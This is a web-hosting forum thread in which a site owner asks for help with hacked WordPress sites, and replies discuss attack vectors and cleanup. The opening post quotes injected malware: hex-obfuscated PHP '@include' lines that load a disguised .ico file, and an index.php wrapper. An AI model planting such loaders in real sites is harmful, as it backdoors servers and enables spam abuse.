Page 1 of 3 123 LastLast
Results 1 to 25 of 66
  1. #1

    Hacked/infected server

    Few days ago I did realize few of my sites are infected. I tried hard to search each file one by one, at the end I found all index.php and and some wp-config.php files have 755 permissions.

    I did open those files and found a code added after <?php and the code added looks like this:

    /*76a6b*/

    @include "\x2fho\x6de/\x7aem\x72ao\x72g/\x70ub\x6cic\x5fht\x6dl/\x6bna\x71u.\x6frg\x2fup\x64at\x65 f\x6fr \x37.0\x2fst\x65p \x32/f\x61vi\x63on\x5f14\x64ed\x36.i\x63o";

    /*76a6b*/

    After decoding this line, I found a *.ico file has been uploaded to my server like this one: favicon_445351.ico

    All index.html files are renamed to index.html.bak.bak and index.php created with this code:

    <?php
    /*85130*/

    @include "\x2fh\x6fm\x65/\x7ae\x6dr\x61o\x72g\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fk\x6ea\x71u\x2eo\x72g\x2fu\x70d\x61t\x65 \x66o\x72 \x37.\x30/\x73t\x65p\x202\x2ff\x61v\x69c\x6fn\x5f1\x34d\x65d\x36.\x69c\x6f";

    /*85130*/

    echo file_get_contents('index.html.bak.bak');

    I tried manually to remove all the @include coes added to my server, change the *.php file permissions to 644, but the next day they add the *.ico file in different directory and the @include codes are added again.

    It seems they are using each visit to my site/s to activate the code which sends spam emails.

    Has anyone have experienced this, and if anyone knows, can you please let me know how can prevent this?

  2. #2
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,075
    You need to determine how they're getting in. No amount of edits like you're doing will likely fix it, it's going to take determining how they're doing it, and closing that hole. Changing permissions on files, that's likely more than simple WP access, so it's possible they have a shell script on your account (or more simply FTP access).
    Your one stop shop for decentralization

  3. #3
    My ftp and ssh logs dont show any other connections, but I did see admin on my WP, which is hidden and Im not sure how to delete that user/admin.

    When I list all users, I can see 2 admins, when I click at the admin list, it only shows my username, I did try with few codes on functions.php but still no luck on finding/removing the second admin.

  4. #4
    Join Date
    Dec 2013
    Location
    Lipova / Romania
    Posts
    457
    First of all, like @bear said, you should find out how they are getting in. It doesn't matter if you remove the second admin as the hacker can add another admin again and so on. Do you have the latest version of WP installed? What services do you use to access your server (ssh, cpanel, ftp)? What ports do you have open? I would suspect a weak ssh/ftp dictionary password or a vulnerable script.
    Unmetered Dedicated Servers with 5Gbps, 10Gbps, 25Gbps and 50Gbps Bandwidth
    Cloud Servers, Colocation, IP Transport, Remote IX and Remote DDoS Protection
    IP Transit with AI Optimized Routing and DDoS Protection in 35 European Locations

  5. #5
    I have latest WP and plugins updated.

    For editing i use cPanel and WinScp. Since there are no other than my logins via ftp and ssh, I dont think password is the case, as for vulnerable script, im not sure.

  6. #6
    Join Date
    Dec 2013
    Location
    Lipova / Romania
    Posts
    457
    It can be a vulnerable plugin (even if updated). You could also have your computer infected with a keylogger (do a scan with an antivirus - malwarebytes is good in my oppinion). Is cPanel up to date? Is it licensed or nulled?
    Unmetered Dedicated Servers with 5Gbps, 10Gbps, 25Gbps and 50Gbps Bandwidth
    Cloud Servers, Colocation, IP Transport, Remote IX and Remote DDoS Protection
    IP Transit with AI Optimized Routing and DDoS Protection in 35 European Locations

  7. #7
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,075
    Quote Originally Posted by Dizi View Post
    no luck on finding/removing the second admin.
    You should be able to remove that from phpMyadmin directly from the database, but it might not fix this. If you can't affect his account via WP, that sounds like he has removed some of your permissions as the admin to protect that. In phpMyadmin, find his user, and compare his settings to yours. Match yours to his, then remove his (or at least change the email and password on it, and reduce his perms at the same time).

    Your installation is likely trashed at this point, and will require a full reinstall of the latest version. No files in that account should be trusted, IMHO. I do say, still, that if he's changing file/directory permissions, he has more access than just WP.

    My ftp and ssh logs dont show any other connections
    A shell script would not likely log actions in SSH logs. It's a PHP script.
    Last edited by bear; 04-09-2017 at 10:09 AM.
    Your one stop shop for decentralization

  8. #8
    Join Date
    Dec 2013
    Location
    Lipova / Romania
    Posts
    457
    @bear : The hacker could have root access to the server (I suspect that, because he is able to modify files), so SSH logs could help him to identify the security hole. However, the hacker can delete the SSH access logs. The hacker could have FTP access to the server, which can be checked in the FTP server logs (any successful login from unknown IP). The hacker can also modify files trough a vulnerable PHP script - this can be identified by checking the webserver access logs/error logs.
    Unmetered Dedicated Servers with 5Gbps, 10Gbps, 25Gbps and 50Gbps Bandwidth
    Cloud Servers, Colocation, IP Transport, Remote IX and Remote DDoS Protection
    IP Transit with AI Optimized Routing and DDoS Protection in 35 European Locations

  9. #9
    I was able to find this:

    Mine: 1 wp_capabilities a:1:{s:13:"administrator";s:1:"1";}

    For this one I cant find the username:

    1331 wp_capabilities a:1:{s:13:"administrator";s:1:"1";}
    1331 wp_user_level 10

    If I delete this from usermeta, will it delete the user as well?

  10. #10
    Join Date
    Dec 2015
    Posts
    125
    If you can see the additional admin user which created without your knowledge, you have to remove it, that user may be the culprit.

    You can remove the WP users from PHPmyadmin as well, access the database using PHPmyadmin and select the table wp_users, there you can find the users and can remove it from there.

    Also please reset all the admin user passwords and cPanel and FTP logins as well.

  11. #11
    When I do list all users in wp_users there is no user with ID: 1331

  12. #12
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,075
    Quote Originally Posted by Gabriel-ZetServers View Post
    The hacker can also modify files trough a vulnerable PHP script - this can be identified by checking the webserver access logs/error logs.
    And a shell script loaded into the account would also allow all of the above, while evading FTP and SSH logs. I'm not saying your reasoning regarding root access is wrong, just that it's less likely, since the bad guy made a WP admin account to do all this. If you have root, why bother?
    In fact, since he did make that WP admin account, that leans toward WP as being the attack vector. A WP admin can upload files, one of which could easily be a shell. With the shell, he can edit files, change perms and so on. Odds are the WP upload logs/directories would show some oddities.

    there is no user with ID: 1331
    Looks an awful lot like "leet", a script kiddie handle...
    Your one stop shop for decentralization

  13. #13
    Join Date
    Dec 2015
    Posts
    125
    Are you able to see the user from WP dashboard. Did you try to remove it from there.

    I strongly recommend you to block WP admin login from all IP's except your IP (you require a static IP in this case).

    You can use .htaccess rule to block access towards wp-login.php file.

    Quote Originally Posted by Dizi View Post
    When I do list all users in wp_users there is no user with ID: 1331

  14. #14
    I did change wp_capabilities to a:1:{s:10:"subscriber";b:1;} and now my wp dashboard shows only 1 admin.

    I will change permission to few index.php files and see if there is any change/file uploaded tomorrow.

    Thank you all for the time you took to help

  15. #15
    Join Date
    Oct 2002
    Location
    /roof/ledge
    Posts
    28,075
    I'd suggest you check that same user (or any new ones) in the DB tomorrow as well. It's likely that account was added via injection of some sort, so it's possible he has DB access (which a shell script can do) on that account/server.
    If you have any malware scanner at your disposal like Maldet, you may wish to run that against your account. It may find something you've missed.
    Your one stop shop for decentralization

  16. #16
    I`ll check and report back since this post may help others with similar or same problem.

  17. #17
    Join Date
    Dec 2013
    Location
    Lipova / Romania
    Posts
    457
    Quote Originally Posted by bear View Post
    And a shell script loaded into the account would also allow all of the above, while evading FTP and SSH logs. I'm not saying your reasoning regarding root access is wrong, just that it's less likely, since the bad guy made a WP admin account to do all this. If you have root, why bother?
    In fact, since he did make that WP admin account, that leans toward WP as being the attack vector. A WP admin can upload files, one of which could easily be a shell. With the shell, he can edit files, change perms and so on. Odds are the WP upload logs/directories would show some oddities.


    Looks an awful lot like "leet", a script kiddie handle...
    Makes sense. Thanks for the detailed explanation. I agree that most likely the hacker use a shell script. Any plugin allowing file uploads should be double checked. Maybe somewhere the script allows .php .cgi or other executable file uploads.
    Unmetered Dedicated Servers with 5Gbps, 10Gbps, 25Gbps and 50Gbps Bandwidth
    Cloud Servers, Colocation, IP Transport, Remote IX and Remote DDoS Protection
    IP Transit with AI Optimized Routing and DDoS Protection in 35 European Locations

  18. #18
    Scan all files maldet with extra signatures for possible backdoors - https://www.rfxn.com/projects/linux-malware-detect/

    Also checck there is not any unknow users in wordpress

    Also use ModSecurity or WAF Firewall.
    ### Malware Expert ###
    - Malware Signatures || Malware Scanner
    - Webhosting ModSecurity Rules

  19. #19
    Join Date
    Apr 2011
    Location
    Cybertron
    Posts
    10,484
    Quote Originally Posted by Dizi View Post
    Few days ago I did realize few of my sites are infected. I tried hard to search each file one by one, at the end I found all index.php and and some wp-config.php files have 755 permissions.

    I did open those files and found a code added after <?php and the code added looks like this:

    /*76a6b*/

    @include "\x2fho\x6de/\x7aem\x72ao\x72g/\x70ub\x6cic\x5fht\x6dl/\x6bna\x71u.\x6frg\x2fup\x64at\x65 f\x6fr \x37.0\x2fst\x65p \x32/f\x61vi\x63on\x5f14\x64ed\x36.i\x63o";

    /*76a6b*/

    After decoding this line, I found a *.ico file has been uploaded to my server like this one: favicon_445351.ico

    All index.html files are renamed to index.html.bak.bak and index.php created with this code:

    <?php
    /*85130*/

    @include "\x2fh\x6fm\x65/\x7ae\x6dr\x61o\x72g\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fk\x6ea\x71u\x2eo\x72g\x2fu\x70d\x61t\x65 \x66o\x72 \x37.\x30/\x73t\x65p\x202\x2ff\x61v\x69c\x6fn\x5f1\x34d\x65d\x36.\x69c\x6f";

    /*85130*/

    echo file_get_contents('index.html.bak.bak');

    I tried manually to remove all the @include coes added to my server, change the *.php file permissions to 644, but the next day they add the *.ico file in different directory and the @include codes are added again.

    It seems they are using each visit to my site/s to activate the code which sends spam emails.

    Has anyone have experienced this, and if anyone knows, can you please let me know how can prevent this?
    It looks like some of the issue is "solved".

    Cleaning up is important, but preventing it from happening again is even more important or you will have these issues again within a week.

    Do you have a Shared account, VPS, or Dedicated Server?

    1. Have you spoken to your host about this?

    2. In some cases, its suggested to change the user name of the account, which the host may do for you.

    3. Have you replaced all the core WordPress files with a clean updated copy?

    4. Replaced all the plugins with a clean updated copy?

    5. Replace the theme with a clean updated copy?

    6. Are any of the plugins or themes from an unknown source?


    All passwords and user names need to be changed. Use SFTP instead of FTP.

    Also, have the computer you use looked at. If they went in through FTP, then once you connect again, they will use that information, log in, erase their tracks, and end up in the same situation again.
    ██ WPCYCLE MANAGED WORDPRESS WEB HOSTING ██
    Managed WordPress VPS & Managed WordPress Dedicated VPS Servers
    Optimized • NVMe • SSD • KVM • NGINX • WordPress Brute Force Protection • Daily Offsite Backups
    Email: sales@wpcycle.comFacebook: wpcycle • Twitter: wpcycle

  20. #20
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    14,134
    You need to find a professional who's experienced in cleaning up this stuff. Don't simply rely on the advice of forum posters, because that's not going to actually solve anything
    Tom Whiting, WHMCS Guru extraordinaire
    Linux problems? WHMCS Problems? Give me a shout
    Check out my WHMCS Addons

  21. #21

    azoyap 1936

    Question: Have You used a nulled WP theme?

    My experience is that 9/10 nulled WordPress Themes are infected with PHP backdoor. So never use anything what is "Nulled".

    I recommend you to check your URL here: sitecheck.sucuri. If its not detecting anything, you still cant be sure your web is clean.

    As a next step download your website to your computer, then check it with : "free DrWeb"
    You can also compress it to zip and upload to virustotal if it is not bigger than 128 MB.

    Just for an examle, I have downloaded the first nulled theme what i found and checked it with Virustotal.
    Detection 4/6
    Cyren,Eset NOD32,DrWeb,Ikarus (sorry, i cant post links)

    As you can see DrWeb is one of the Antivirus software's which is detecting the infection. It will also find the infected files, which you can analise for infection. For this what I am using is NOTEPAD ++ with a plugin which allows compare 2 files. Than you need to find a clean wordpress file (try Github) and compare the 2 files. Thisway you can find the Malicious code and clean it.

    It is also possible, the malicious code will be cached so you need to clean that too.
    Last edited by VpsGhost; 04-10-2017 at 04:14 AM.

  22. #22
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    14,134
    Quote Originally Posted by VpsGhost View Post
    Question: Have You used a nulled WP theme?
    Or plugin... But yes, that's how this stuff gets injected.
    As someone else mentioned above, use maldet, scan the server if you have root access.
    Tom Whiting, WHMCS Guru extraordinaire
    Linux problems? WHMCS Problems? Give me a shout
    Check out my WHMCS Addons

  23. #23
    Join Date
    Apr 2011
    Location
    Cybertron
    Posts
    10,484
    Quote Originally Posted by VpsGhost View Post
    Question: Have You used a nulled WP theme?
    Quote Originally Posted by whmcsguru View Post
    Or plugin... But yes, that's how this stuff gets injected.

    It doesn't have to be a nulled theme or plugin. There are legitimate themes and plugins where the designer decided to reinvent the upload process that WordPress already provides, and add their own upload process and folder. End result...people know of this unprotected second upload folder and upload php files to it Instant issues. The only thing that saves them at that point is whether or not the account/host allow scripts to be easily executed. One doesn't even need to be skilled in coding to just Google those themes and find all the unprotected websites that are publicly online.
    ██ WPCYCLE MANAGED WORDPRESS WEB HOSTING ██
    Managed WordPress VPS & Managed WordPress Dedicated VPS Servers
    Optimized • NVMe • SSD • KVM • NGINX • WordPress Brute Force Protection • Daily Offsite Backups
    Email: sales@wpcycle.comFacebook: wpcycle • Twitter: wpcycle

  24. #24
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    14,134
    You're right. It certainly doesn't have to be. However, the odds are way higher if that's the case
    Tom Whiting, WHMCS Guru extraordinaire
    Linux problems? WHMCS Problems? Give me a shout
    Check out my WHMCS Addons

  25. #25
    Join Date
    Mar 2009
    Location
    Here Today - Gone to Maui
    Posts
    9,962
    I think everyone reading this who hasn't been hacked can understand from the complexity of the replies here that being proactive in preventing attacks is crucial. Dealing with them on the backend is not only frustrating, but time consuming.
    ProlimeHost - Dedicated Server Hosting & KVM SSD VPS
    Three Datacenter Locations: Los Angeles, Denver & Singapore
    SuperMicro Hardware | Multiple Bandwidth Providers | 24/7 On-site Engineers

Page 1 of 3 123 LastLast

Similar Threads

  1. Replies: 6
    Last Post: 08-06-2008, 02:21 PM
  2. Somebody hacked my server ?
    By brianz in forum Hosting Security and Technology
    Replies: 7
    Last Post: 01-13-2008, 04:02 AM
  3. Where do you report someone that hacked your server?
    By laur in forum Web Hosting Lounge
    Replies: 9
    Last Post: 02-24-2007, 06:48 PM
  4. SITE5 - Hacked or server issues?
    By mondala in forum Hosting Security and Technology
    Replies: 17
    Last Post: 04-10-2006, 07:29 AM
  5. php shell file , hacked the server
    By ramram in forum Hosting Security and Technology
    Replies: 2
    Last Post: 12-04-2005, 09:31 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •